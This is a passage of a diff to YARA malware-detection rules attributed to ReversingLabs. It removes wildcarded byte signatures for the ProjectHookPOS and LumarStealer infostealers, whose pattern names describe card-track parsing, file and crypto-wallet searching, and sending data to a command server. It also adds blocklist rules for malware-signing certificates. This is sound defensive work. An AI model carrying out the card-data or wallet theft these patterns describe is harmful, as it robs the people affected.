"TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Infostealer" - tc_detection_name = "ProjectHookPOS" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $calc_luhn = { - 55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 - 68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 C0 89 45 ?? 8B 45 ?? 85 C0 74 ?? 8B - D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 ?? - 8B 00 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 85 C0 0F 94 C3 8B 45 ?? 85 C0 74 ?? 8B D0 - 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 ?? 8B - 00 8B F0 85 F6 7E ?? BF ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B7 54 7A ?? E8 ?? ?? ?? ?? - 8B 45 ?? 83 CA ?? E8 ?? ?? ?? ?? 0F B6 D0 66 83 FA ?? 75 ?? C6 45 ?? ?? EB ?? 84 DB - 74 ?? 0F B6 C0 0F B6 80 ?? ?? ?? ?? 01 45 ?? EB ?? 0F B6 C0 01 45 ?? 80 F3 ?? 47 4E - 75 ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 75 ?? 80 7D ?? ?? 74 ?? 33 DB EB ?? B3 - ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? - ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C3 5F 5E 5B 8B E5 5D C3 - } - $track_1_reverse = { - 55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 8B F1 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 - 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B C6 33 D2 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? - 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 - ?? 8B 00 8B D8 83 FB ?? 7C ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? - ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 4B 85 DB 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? - ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5E 5B 59 59 5D C3 - } - $check_validity_1 = { - 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 66 83 38 ?? 75 ?? - 8B 45 ?? 85 C0 74 ?? 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? - ?? 66 83 78 ?? ?? 0F 94 C0 EB ?? 33 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? - 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 66 83 78 ?? ?? 0F - 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 - ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 66 81 78 ?? ?? ?? 73 ?? 0F B6 40 ?? 0F B6 C0 0F A3 - 06 72 ?? 33 C0 EB - } - $encode_and_send_1 = { - 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B F0 8D 4D ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8B C6 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - C6 E8 ?? ?? ?? ?? 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B CB BA - ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8 - } - $form_create_1 = { - 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 - ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 55 - ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 - ?? ?? ?? ?? 50 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? - ?? ?? 84 C0 0F 84 - } - $form_create_2 = { - 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B C3 E8 ?? ?? ?? ?? 05 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 55 ?? - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B C3 E8 - } - $form_create_3 = { - B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 - BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? - 8B 4D ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? - ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? - ?? 8B C3 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 09 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? - A3 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? A1 ?? - ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 84 - C0 74 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CODE - HANDLE, s. r. o." and pe.signatures[i].serial=="54:c7:93:d2:22:4b:dd:6c:a5:27:bb:2b:7b:9d:fe:9d" and 1629676800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_8Cece6Df54Cf6Ad63596546D77Ba3581 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "bde12eeb-c4f8-5da3-8493-0f94cb1bf1f7" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11724-L11742" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d6b5bca36ef492ce9b79be905c86c66d43ef38701dafeed977229034119bd00d" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($calc_luhn and $track_1_reverse and $check_validity_1 and $encode_and_send_1 and $form_create_1 and $form_create_2 and $form_create_3) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Mikael LLC" and (pe.signatures[i].serial=="00:8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" or pe.signatures[i].serial=="8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81") and 1613088000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Infostealer_Lumarstealer : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_984E84Cfe362E278F558E2C70Aaafac2 : INFO FILE { meta: - description = "Yara rule that detects LumarStealer infostealer." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a1358846-7cc2-53ac-89a9-c6c99f492284" - date = "2023-12-07" - modified = "2023-12-07" + id = "180f1209-7031-50fb-b1fc-3d357f2b73a1" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/infostealer/Win32.Infostealer.LumarStealer.yara#L1-L190" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0bc9e12396b1e85f69b965e9ea50960c59c50aba40317fb4de8f6abd092ec7d2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11744-L11762" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e7a8f3dff77121df53d5f932f861e15208b0607ba77712f40927bc14b17a53cd" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Infostealer" - tc_detection_name = "LumarStealer" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $collect_os_information_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 66 - A3 ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? - 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 - 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 - 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? C6 45 ?? ?? EB ?? 8A 45 ?? 04 ?? 88 45 ?? 0F B6 4D - ?? 83 F9 ?? 73 ?? 0F B6 55 ?? 0F B7 44 55 ?? 0F B7 0D ?? ?? ?? ?? 3B C1 75 ?? FF 25 - ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 89 55 ?? 89 55 ?? C7 45 ?? ?? - ?? ?? ?? 8D 75 ?? B8 ?? ?? ?? ?? 33 C9 0F A2 89 06 89 5E ?? 89 4E ?? 89 56 ?? B8 ?? - ?? ?? ?? 6B C8 ?? 8B 54 0D ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? - 89 45 ?? 8B 4D ?? 3B 4D ?? 77 ?? 8D 75 ?? 8B 45 ?? 33 C9 0F A2 89 06 89 5E ?? 89 4E - ?? 89 56 ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 55 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? EB ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 ?? EB ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 4D ?? 51 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 80 ?? ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? 52 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 - ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? - ?? 50 B9 ?? ?? ?? ?? D1 E1 8B 91 ?? ?? ?? ?? FF D2 8B 45 ?? A3 ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? BA ?? ?? ?? ?? 6B C2 - } - $collect_os_information_p2 = { - 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 6B D1 ?? 8B 82 ?? ?? ?? ?? FF - D0 85 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? A3 ?? ?? - ?? ?? 89 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? - FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 51 - 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ?? 8B 4D ?? 89 - 0D ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 6A ?? B9 ?? ?? ?? ?? C1 E1 ?? 8B 91 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ?? - ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB - ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 73 ?? 8B 45 ?? 0F B7 0C 45 ?? ?? ?? ?? 8B - 55 ?? 0F B7 04 55 ?? ?? ?? ?? 3B C8 75 ?? 33 C9 8B 55 ?? 66 89 0C 55 ?? ?? ?? ?? EB - ?? EB ?? 5E 5B 8B E5 5D C3 - } - $send_data_to_c2_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 - ?? 8B 82 ?? ?? ?? ?? FF D0 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4D ?? 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 6A ?? 6A ?? 0F BF 55 ?? 52 B8 ?? ?? ?? - ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A - ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? - ?? ?? ?? EB ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 7D ?? 8B 45 ?? 0F B7 8C 45 ?? - ?? ?? ?? 83 F9 ?? 75 ?? 8B 55 ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? EB ?? EB ?? - 8B 4D ?? 0F B7 94 4D ?? ?? ?? ?? 85 D2 74 ?? 8B 45 ?? 8B 4D ?? 8A 94 4D ?? ?? ?? ?? - 88 54 05 ?? 8B 45 ?? 0F BE 4C 05 ?? 83 F9 ?? 75 ?? 8B 55 ?? C6 44 15 ?? ?? EB ?? 8D - 45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 0F - B6 15 ?? ?? ?? ?? 83 FA ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 - ?? ?? ?? ?? C1 E0 ?? 8A 4D ?? 88 88 ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 FA ?? 75 - } - $send_data_to_c2_p2 = { - C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B C8 ?? 8A 55 ?? 88 - 91 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 83 F8 ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 - ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 ?? 8A 45 ?? 88 82 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B - D1 ?? C6 82 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B C8 ?? 8A 15 ?? ?? ?? ?? 88 91 ?? ?? ?? - ?? B8 ?? ?? ?? ?? 6B C8 ?? C6 81 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 74 ?? 6A ?? 8D - 45 ?? 50 8B 4D ?? 51 BA ?? ?? ?? ?? D1 E2 8B 82 ?? ?? ?? ?? FF D0 83 F8 ?? 74 ?? 6A - ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 BA ?? ?? ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? - ?? FF D1 83 F8 ?? 74 ?? 6A ?? 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 8B 4D ?? 51 BA ?? ?? - ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? ?? FF D1 83 F8 ?? 74 ?? EB ?? 68 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 - BA ?? ?? ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? ?? FF D1 B8 ?? ?? ?? ?? EB ?? 33 C0 8B E5 5D - C3 - } - $find_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? - ?? 52 A1 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? 6B D1 ?? 8B 82 ?? ?? ?? ?? FF D0 89 45 ?? 8B - 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 D2 8B 0D ?? ?? ?? ?? 66 89 54 41 ?? 83 - 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 15 ?? - ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? 0F B7 4D ?? 8D 54 08 ?? 81 FA ?? ?? ?? ?? 72 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 - C4 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? - ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 74 ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 - ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? - ?? ?? ?? 66 89 4D ?? 33 D2 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 - } - $find_files_p2 = { - 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? BA - ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? - 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 - 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA - ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? 33 D2 - 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 - 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 - ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 - 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 - 89 45 ?? 33 C9 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 - ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 66 89 45 ?? B9 ?? ?? ?? ?? - 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 - 89 4D ?? 33 D2 66 89 55 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 - } - $find_files_p3 = { - C0 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 75 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D - 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 45 ?? 50 8D 8D - ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? - 83 C4 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? - ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? 0F B7 15 ?? ?? ?? ?? - A1 ?? ?? ?? ?? 8D 0C 50 51 8D 55 ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 8B 4D ?? 51 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A 0D ?? - ?? ?? ?? 80 C1 ?? 88 0D ?? ?? ?? ?? 0F B7 55 ?? 33 C0 8B 0D ?? ?? ?? ?? 66 89 04 51 - 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 B9 ?? ?? ?? ?? C1 E1 ?? 8B 91 ?? ?? ?? ?? FF D2 85 - C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 - } - $find_crypto_wallets_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? - ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? - 51 8B 55 ?? 52 B8 ?? ?? ?? ?? 6B C8 ?? 8B 91 ?? ?? ?? ?? FF D2 89 45 ?? 8B 45 ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 8B 55 ?? 66 89 4C 42 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? - ?? ?? 83 C4 ?? 0F B7 55 ?? 8D 44 10 ?? 3D ?? ?? ?? ?? 72 ?? E9 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? 51 8B 55 ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? - ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? D1 - E0 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 E1 - ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 0F 84 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D - ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? 